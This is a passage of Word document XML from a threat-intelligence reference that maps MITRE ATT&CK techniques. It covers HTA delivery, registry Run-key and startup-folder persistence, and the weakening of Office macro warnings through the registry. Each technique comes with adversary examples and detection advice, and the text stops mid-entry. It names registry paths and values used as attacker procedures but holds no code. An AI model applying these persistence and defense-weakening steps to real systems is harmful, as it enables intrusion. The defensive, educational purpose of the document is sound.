          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APT28 hacked Forbes.com in 2014, using a Flash zero-day (CVE-2014-0502) to infect visitors from defense sectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gootloader served malicious links via manipulated search results, redirecting to fake "document sharing" sites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRPr="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00B52D87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious HTML Application (HTA) Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries host HTML Applications (.hta) on cloud services (e.g., Google Drive). Clicking the link auto-executes scripts to download malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APT33 delivered HTA files via spearphishing, executing PowerShell to fetch Cobalt Strike.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bazar used Google Docs links to decoy landing pages, triggering malware downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection Insights:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Monitor for anomalous link clicks leading to rare domain access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analyze email headers for spoofed sender addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRPr="00B52D87" w:rsidRDefault="00204DBF" w:rsidP="00B52D87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRPr="00B52D87" w:rsidRDefault="00264887" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidR="00D62A00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D62A00" w:rsidRPr="00D62A00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0003):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00D62A00" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence involves techniques adversaries use to retain access to compromised systems after reboots, credential changes, or disruptions. This ensures continuous access for activities like data theft or lateral movement. Adversaries achieve this by modifying system processes, registry entries, or low-level firmware to automatically reactivate malicious components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00AF435F" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF435F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Boot or Logon Autostart Execution → Registry Run Keys / Startup Folder (T1547.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition: Adversaries abuse Windows startup mechanisms to execute malicious payloads during system boot or user logon. This sub-technique leverages registry keys or startup folders to launch programs automatically, often with user-level privileges, ensuring malware reactivation post-reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF435F" w:rsidRDefault="00AF435F" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00AF435F" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF435F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00AF435F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Registry Run Key Injection via HKLM for System-Wide Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mechanism: Adversaries add entries to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, causing payloads to execute at boot for all users. This requires administrative privileges but ensures execution before user login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adversary Example: APT41 added a registry key in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to load Cobalt Strike beaconing payloads during system startup. This enabled long-term command-and-control (C2) access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Survives OS reinstalls if backup restoration includes compromised registry hives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00AF435F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Startup Folder Shortcut Deployment for User-Specific Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malicious shortcuts (.lnk files) or executables are placed in user-specific (C:\Users\&lt;user&gt;\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) or system-wide (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp) startup folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Adversary Example: BlackEnergy 3 dropped a DLL in the system-wide startup folder and created a shortcut to it, ensuring execution upon any user login. This facilitated ransomware deployment across reboots.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Evades detection by masquerading as benign applications (e.g., "Windows Update Helper").</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Restrict Registry Modifications: Use Group Policy to block unauthorized changes to Run keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Monitor Startup Folders: Deploy endpoint detection (EDR) to alert on new files in startup paths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) Technique: Modify Registry (T1112)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries alter Windows Registry entries to hide payloads, impair defenses, or maintain persistence. The registry acts as a configuration database, and modifications can affect system behavior, security policies, or credential storage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151F35" w:rsidRDefault="00151F35" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00D62A00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Security Policy Weakening via Macro-Enabling Keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries disable security warnings for Office macros by modifying HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\VBAWarnings (set to 0). This enables malicious document execution without user alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Gamaredon Group manipulated these keys to ensure VBA macros in phishing documents executed silently, dropping Pterodo backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Bypasses email-filtering defenses by exploiting trusted user-app interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00151F35" w:rsidRDefault="00D62A00" w:rsidP="00151F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151F35">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Credential Storage in Registry for Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D62A00" w:rsidRPr="00D62A00" w:rsidRDefault="00D62A00" w:rsidP="00303C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62A00">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malware stores harvested credentials in registry values (e.g., HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters), often encrypted or disguised as benign data.</w:t>
